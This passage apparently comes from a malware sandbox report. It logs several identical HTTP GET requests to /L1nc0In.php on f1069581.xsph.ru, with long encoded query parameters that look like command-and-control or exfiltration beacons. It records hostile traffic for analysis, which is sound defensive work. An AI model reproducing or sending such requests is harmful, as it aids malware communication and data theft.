asdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSp